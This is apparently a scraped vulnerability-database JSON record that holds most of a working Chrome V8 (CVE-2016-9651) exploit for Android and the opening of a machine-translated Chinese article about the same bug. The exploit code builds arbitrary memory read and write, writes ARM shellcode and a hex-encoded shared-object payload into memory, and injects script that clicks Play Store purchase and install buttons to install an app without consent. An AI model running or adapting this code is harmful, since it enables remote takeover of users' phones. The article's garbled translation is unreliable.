(str.charCodeAt(i)+0x100).toString(16).substr(-2); \narr.push(hexstr.charCodeAt(0)); \narr.push(hexstr.charCodeAt(1)); \n} \n} \nreturn String.fromCharCode.apply(null,arr); \n} \n \nvar dArray = []; \nvar index = (0x8100-36)*2; \nfor(var i=0;i<0x20000/8;i++){ \ndArray[i]=str_to_double(\"%03x%03x\"); \n} \n \nvar occulen = 0; \nvar i = 0; \nvar savedChunk = new Uint8Array(0x8100); \nvar hiddenValue = getHiddenValue(); \nvar arr=[]; \nfillNewSpace(new String); \nfindNewSpace(); \nvar classStr = 'class x extends Array{}'; \nfor(var i=0;i<classStr.length;i++){ \narr[i]=classStr.charCodeAt(i); \n} \nvar magicStr = String.fromCharCode(0x86,0x24); \nclassStr=String.fromCharCode.apply(null,arr); \nvar ab = new ArrayBuffer(0x1243); \nvar fun = eval(classStr); \nObject.assign(fun,hiddenValue); \nvar oobStr = fun.toString(); \n \n/*(gdb) x/20xw 0x5600c45c array buffer layout \n* 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020 \n* 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000 \n*/ \n//overwrite huge string as array buffer \nvar abLengthIndex = oobStr.indexOf(magicStr); \nvar strArrayBuffer = oobStr.substr(abLengthIndex-12,32); \n//replace the byteLength \nvar LengthAddr = getObjAddr(lengthInOldSpace); \nvar strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24); \nvar strBase = \"\\x00\\x00\\x00\\x00\"; \nstrArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12); \nstrArrayBuffer = myencode(strArrayBuffer); \nfor(var i=0;i<strArrayBuffer.length/8;i++){ \nvar d = strArrayBuffer.substr(i*8,8); \ndArray[index/8+i] = str_to_double(d); \n} \n \nvar classStrAddr = getObjAddr(classStr)>>>0; \n//set read position \nvar readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head \n//length control the length of unscaped string, generated string has 12 bytes head \n//left 0x1000*2 bytes to avoid gc \nvar subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000); \n \n//save the the chunk head to be corrupted \nvar nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12; \nvar savedThunkStr = oobStr.substr(nextThunkOffset,0x8100); \nfor(var i =0;i<savedThunkStr.length;i++){ \nsavedChunk[i] = savedThunkStr.charCodeAt(i); \n} \n \nvar pos1=new String; \nvar pos1addr = getObj24BitsAddr(pos1)-1; \n \n//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray \nocculen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff); \n//minus the length of double array \nif(occulen<0x40000+16+8) \nthrow \"no enough room\"; \nocculen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray \nif(occulen%4!==0) \nthrow \"length don't align\"; \nvar arrocc=new Array((occulen/4)); \n//set unescape write position \nvar occDoubleArray = dArray.concat(); \n \nvar b=unescape(subOobStr); \n//restore the corrupted chunk head \nvar u8 = new Uint8Array(selectedStr,nextTrunk,0x8100); \nfor(var i=0;i<savedChunk.length;i++){ \nu8[i] = savedChunk[i]; \n} \n \nprint(\"long string allocated at \"+classStrAddr.toString(16)); \nif(typeof(selectedStr)===\"string\"){ \nprint(\"overwrite failed\"); \npostMessage(false); \nclose(); \nreturn; \n//throw \"overwrite failed\"; \n} \nvar fakeab = selectedStr; \nprint(\"faked array buffer byte length is \"+fakeab.byteLength.toString(16)); \nvar globaldv = new Uint32Array(fakeab); \n \nfunction read_uint32(from_address){ \nvar u32 = globaldv[(from_address/4)>>>0]; \nreturn u32>>>0; \n} \n \n \nfunction read_uint8(from_address){ \nfrom_address = from_address>>>0; \nvar index = (from_address/4)>>>0; \nvar mask = from_address%4; \nvar u32 = globaldv[index]; \nu32 = u32<<8*(3-mask); \nreturn u32>>>24; \n} \n \nfunction read_uint32_unalign(from_address){ \nvar u32 = 0; \nfor(var i=3;i>=0;i--){ \nvar u8 = read_uint8(from_address+i); \nu32 = u32*0x100+u8; \n} \nreturn u32>>>0; \n} \n \n//rw to execute \n//get function point of v8::internal::Accessors::ReconfigureToDataProperty \nfunction getFixedFunctionPoint(fakeab){ \nvar FunctionAddress = getObjAddr(Function); \nvar u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000); \nvar map = u32[0]; \nu32 = new Uint32Array(fakeab,map-1,0x1000); \n//instance descriptors \nvar descriptors = u32[7]; \nu32 = new Uint32Array(fakeab,descriptors-1,0x1000); \nvar lengthAccessorInfo = u32[6]; \nu32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000); \nvar setterForeign = u32[4]; \nu32 = new Uint32Array(fakeab,setterForeign-1,0x1000); \nvar functionPoint = u32[1]; \nreturn functionPoint-1; \n} \n \nvar funPoint = getFixedFunctionPoint(fakeab); \nprint(\"ReconfigureToDataProperty at\"+funPoint.toString(16)); \nvar pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval \n \nvar point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000 \nprint(\"chrome.apk base at \"+point.toString(16)); \n \nfunction find(startAddr,len,pattern){ \nfor(var i=0; i<(len-pattern.length); i++ ) { \nfor(var j=0;j<pattern.length;j++){ \nvar temp = read_uint8(startAddr+i+j); \n//print(temp.toString(16)); \nif(temp!=pattern[j]) break; \n} \nif(j==pattern.length) return startAddr+i; \n} \nprint(\"find failed\"); \n} \nvar pattern_position=find(point,0x10000000,pattern); \n \nprint(\"find pattern at \"+to_hex(pattern_position)); \n \n \n \n \n \nfunction get_dest_from_blx(addr) { \nvar val = read_uint32_unalign(addr); \nvar s = (val & 0x400) >> 10; \nvar i1 = 1 - (((val & 0x20000000) >> 29) ^ s); \nvar i2 = 1 - (((val & 0x8000000) >> 27) ^ s); \nvar i10h = val & 0x3ff; \nvar i10l = (val & 0x7fe0000) >> 17; \nvar off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2); \nreturn ((addr + 4) & ~3) + off; \n} \n \nfunction backup_original_code(start_address){ \nvar backup_arr = []; \nset_access_address(start_address); \nvar u8arr=new Uint8Array(faked_ab); \nfor(var i=0;i<shellcode.length+4096;i++){ \nbackup_arr[i]=u8arr[i]; \n} \nreturn backup_arr; \n} \n \nfunction restore_original_code(start_address,backup_arr){ \nset_access_address(start_address); \nvar u8arr=new Uint8Array(faked_ab); \nfor(var i=0;i<shellcode.length+4096;i++){ \nu8arr[i]=backup_arr[i]; \n} \n} \n \n \nhuge_func({}); \nprint(\"blx instruction content is \"+to_hex(read_uint32_unalign(pattern_position-4))); \nvar dlsym_addr = get_dest_from_blx(pattern_position-4); \nprint(\"dlsym address is \"+to_hex(dlsym_addr)); \nvar huge_func_address = getObjAddr(huge_func)-1; \nprint(\"huge func address is \"+to_hex(huge_func_address)); \nfor(var i=0;i<20;i++){ \nprint(to_hex(read_uint32(huge_func_address+i*4))); \n} \nvar huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4 \nprint(\"huge func code entry is \"+to_hex(huge_func_code_entry)); \nprint(to_hex(read_uint32(huge_func_code_entry))); \n \n//var so_str= \"\"; \nvar shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe \nvar so_str = \"7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e20 \nvar arrayBuffer = new ArrayBuffer(0x1000000); \nvar arrayBufferAddress = getObjAddr(arrayBuffer)-1; \nvar backingStoreAddress = read_uint32(arrayBufferAddress+4*4); \nvar args_address = backingStoreAddress+1024; \nfunction write_shellcode(dlsym_addr,buffer){ \n//ldr r0,[pc,4]//0xe59f0004 \n//ldr r1,[pc,4]//0xe59f1004 \n//b shellcode;//0xea000001 \n//dlopen_addr//array_buffer_address \n//dlsym_addr \n//shellcode \n//var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr]; \nvar stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000]; \nfor(var i=0;i<stub.length;i++){ \nglobaldv[buffer/4+i]=stub[i]; \n} \n \nshellcode = shellcode.concat([0,0,0,0]); \nfor(var i=0;i<shellcode.length/4>>>0;i++){ \n// u8arr[i+4*stub.length]=shellcode[i]; \nglobaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]); \n} \nreturn stub.length*4+shellcode.length; \n} \n \nfunction xss_code(){ \n//alert(navigator.userAgent); \n//alert(document.cookie); \nvar i1=setInterval(function(){ \nif(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){ \nconsole.log(\"wait load complete\"); \nreturn; \n} \nclearInterval(i1); \nvar i2=setInterval(function(){ \ndocument.getElementsByClassName(\"price buy id-track-click\")[0].click(); \nvar installButton = document.getElementById(\"purchase-ok-button\"); \nif(installButton == null) \nreturn; \ninstallButton.click(); \ndocument.write(\"<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>\"); \nclearInterval(i2); \nsetTimeout(function(){ \nwindow.open(\"intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end\"); \n},26000); \n},500); \n},500); \n} \n \nvar js_str=\"\\n\"+xss_code.toString()+\"xss_code();\\n\"; \n//var backup_arr = backup_original_code(huge_func_code_entry); \nvar writed_len = write_shellcode(dlsym_addr,huge_func_code_entry); \nvar args_view = new DataView(arrayBuffer,1024,100); \nvar so_file_view = new DataView(arrayBuffer,4096); \nvar js_view = new DataView(arrayBuffer,0x100000); \nargs_view.setUint32(0,dlsym_addr+0xc,true); \nargs_view.setUint32(4,dlsym_addr,true); \nargs_view.setUint32(8,huge_func_code_entry,true); \nargs_view.setUint32(12,writed_len,true); \nargs_view.setUint32(16,backingStoreAddress+4096,true); \nargs_view.setUint32(20,so_str.length/2,true); \nargs_view.setUint32(24,backingStoreAddress+0x100000,true); \nargs_view.setUint32(28,js_str.length,true); \nprint(\"length is \"+so_str.length); \nfor(var i=0;i<so_str.length;i+=2){ \nvar value = so_str.substr(i,2); \nvalue = \"0x\"+value; \nso_file_view.setUint8(i/2,parseInt(value)); \n} \nfor(var i=0;i<js_str.length;i++){ \njs_view.setUint8(i,js_str.charCodeAt(i)); \n} \n \nprint(\"begin execute shellcode\"); \nhuge_func({}); \n \nprint(\"done\"); \npostMessage(true); \n//prevent arrayBuffer to be released \nwhile(1){} \n \n} \n//main world \nfunction print(){ \nconsole.log.apply(null,arguments); \ndocument.write('<p >'); \ndocument.write.apply(document,arguments); \ndocument.write(\"<p>\"); \n} \n \n// Build a worker from an anonymous function body \nvar blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) ); \n \nvar worker; \nvar exploitSucc = false; \nvar count = 0; \nfunction startExploit(){ \nprint(\"worker thread is started\"); \nworker = new Worker( blobURL ); \ncount++; \nworker.onmessage = function(e){ \nprint(\"exploit result is \"+e.data); \nexploitSucc = e.data; \nif(exploitSucc==false){ \nstartExploit(); \nreturn; \n} \nvar end = +new Date(); \nprint(\"time diff is \"+(end-begin)/1000); \n//top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android'; \ntop.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner'; \n} \n} \nvar begin = +new Date(); \nstartExploit(); \n \nvar savedCount = 0; \nvar hangMonitor = setInterval(function (){ \nif(exploitSucc==true){ \nclearInterval(hangMonitor); \n}else{ \nif(savedCount==count){//maybe hang \nprint(\"worker maybe hange\"); \nworker.terminate(); \nstartExploit(); \n}else{ \nprint(\"worker is normal\"); \nsavedCount = count; \n} \n} \n},10000); \n//URL.revokeObjectURL( blobURL ); \n \n \n</script> \n</html> \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142939/googlechromev8-exec.txt"}], "myhack58": [{"lastseen": "2017-06-14T16:17:02", "bulletinFamily": "info", "description": "1. Description \nA South American Amazon Basin rainforest butterfly, occasionally flapping a few wings, maybe in Texas cause a tornado? This I'm not sure I can determine is the program of any one of the minor errors after amplification are possible for the program to produce disastrous consequences. In the 11 months Seoul, South Korea held the PwnFest game, we use the V8 of a logic error(CVE-2016-9651)to achieve the Chrome remote arbitrary code execution, this logic is very small, can be said to be a product compared to the poor of the slag hole, but through a combination of some of Circo kinky clever, our final realization of the vulnerability of the stable use. This loophole revelation to me is:\u201cnever give up easily a loophole, no way to easily determine a vulnerability to non-utilization\u201d. \nThis article follows the structure of the organization: the second section describes the V8 engine in the\u201dinvisible\u201dobject of private property; the third section will lead us to the use of this subtle logic errors; the fourth section describes how to incorporate this logic into an out of bounds read vulnerability; the fifth section will introduce an out of bounds read vulnerability converted to out of bounds write vulnerability in the ideas, this section is of the whole use process in the most ingenious of the a ring; the sixth section is all part of the most difficult step, detailing how to perform a full memory space Feng Shui and how will The out of bounds write vulnerability into arbitrary memory address read and write; the seventh section describes from the arbitrary memory address read and write to arbitrary code execution. \n2. Stealth private property \nIn JavaScript, an object is an associative array, also can be seen as a key-value pair collection. These key-value pairs also referred to as object attributes. Properties of the key can be a string also can be a symbol, as shown below: \n! [](/Article/UploadPic/2017-6/2017614184944156. png? www. myhack58. com) \nCode fragment 1: The object properties \nThe above code fragment first defines an object normalObject, then give this object adds two properties. This can be by JavaScript to read and modify the properties of I call them public property. Can through the JavaScript Object Object provides two methods to get an object of All public properties of the button, the following JavaScript statement can give the code 1 normalObject object of All public properties of the key. \n! [](/Article/UploadPic/2017-6/2017614184944448. png? www. myhack58. com) \nExecution results: ownPublicKeys value[\"string\", Symbol(d)] \nIn the V8 engine, in addition to public properties, there are some special JavaScript objects there are some special properties that only the engine can be accessed, for user JavaScript is not visible, I will be such a property is called private property. In the V8 engine, the symbol(Symbol)also include two public symbols and private symbols, public symbols is a user JavaScript can create and use private symbols then only the engine can create, is for internal engine use. Private properties generally use private symbols as keys, because the user JavaScript can't get private symbols, all can not to the private symbol as a key to access private property. Since private property is concealed, then how can the observed private property? d8 is the V8 engine of the Shell program, by the d8 call the runtime function DebugPrint you can view the one object of all attributes. For example, we can through the following ways to view the code 1 as defined in the normalObject all properties: \n! [](/Article/UploadPic/2017-6/2017614184944952. png? www. myhack58. com) \nFrom the shown on the d8 output of the results, normalObject only has two public properties, not private properties. Now let us look at a special object the error object's properties. \n! [](/Article/UploadPic/2017-6/2017614184944434. png? www. myhack58. com) \nCompare specialObject object's public properties and all properties can be found in all the property than the public property the A KEY for stack_trace_symbol of the property, this property is a specialObject of a private property. The next section describes the private attributes of a v8 engine logic errors. \n3. Tiny logic error \nIn the introduction to this logic error before, first understand the next Object. assign this method,according to the ECMAScript/262 explanation[1]: \nThe assign function is used to copy the values of all of the enumerable own properties from one or more source objects to a target object \nSo the question is, private property is a v8 engine for internal use property, other JavaScript engines may simply not exist in private properties, the private properties should be enumerable, private property should not be in an assignment is copied, the ECMAScript is simply not made provisions. I guess the v8 developers in the realization of the Object. assign when there is no very careful considering this issue. Private property is for the v8 engine used inside of attributes, an object's private attributes should not be assigned to another object, otherwise it will lead to the private attribute value is the user JavaScript changes. v8 is a high performance JavaScript engine, in order to pursue high performance, many function implementations have two channels, a fast channel and a slow channel, when a certain condition is satisfied, the v8 engine will use the fast path to improve performance, because the use of fast track to a vulnerability in the case there are many precedents, such as CVE-2015-6764[2], CVE-2016-1646 is because walking fast channel problems. Similarly, in the realization of the Object. assign, the v8 also for the realization of the Quick passage,as the following code shown in[3]: The \n! [](/Article/UploadPic/2017-6/2017614184945980. png? www. myhack58. com) \nCode fragment 2: a logic error \nIn the Object. assign the fast path implementation, the first will determine the current assignment meets the go fast the channel conditions, if not satisfied, simply return failure go slow channel, if you meet the simple will of the source object, all the properties assigned to the target object, and not filter those keys is a proprietary symbol and having enumerated the characteristics of the properties. If the target object also has the same private property, it will result in private property re-assignment. This is the article you want to discuss logical errors. Google for this error the Fix is quite simple [4] is, to the object to increase any attribute, if this attribute is a private attribute, then this attribute is increased, non-enumerable properties. Now the butterfly has been found, that it is how flapping wings can achieve remote arbitrary code execution?, We from the first fan to start, the logic is converted to out of bounds read vulnerability. \n\n4. From logic errors to out of bounds read \nNow we have the object's enumerable private property re-assignment of capacity, in order to use this ability, I traverse a v8 in all of the private symbols[5], try to give these private symbols for the key private property re-assignment, hoping to be able to upset the v8 engine of the internal execution flow, it is disappointing to me and not much harvest, but there are two private symbol caught my attention, they are class_start_position_symbol and class_end_position_symbol, from these two symbols of the prefixes we guess which of the two private symbols possible with JavaScript in a class-related. So we define a class to observe all its attributes. \n\n\n**[1] [[2]](<87022_2.htm>) [[3]](<87022_3.htm>) [[4]](<87022_4.htm>) [next](<87022_2.htm>)**\n", "modified": "2017-06-14T00:00:00", "published": "2017-06-14T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/87022.htm", "id": "MYHACK58:62201787022", "title": "The butterfly effect and the program error---a slag-hole the use-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}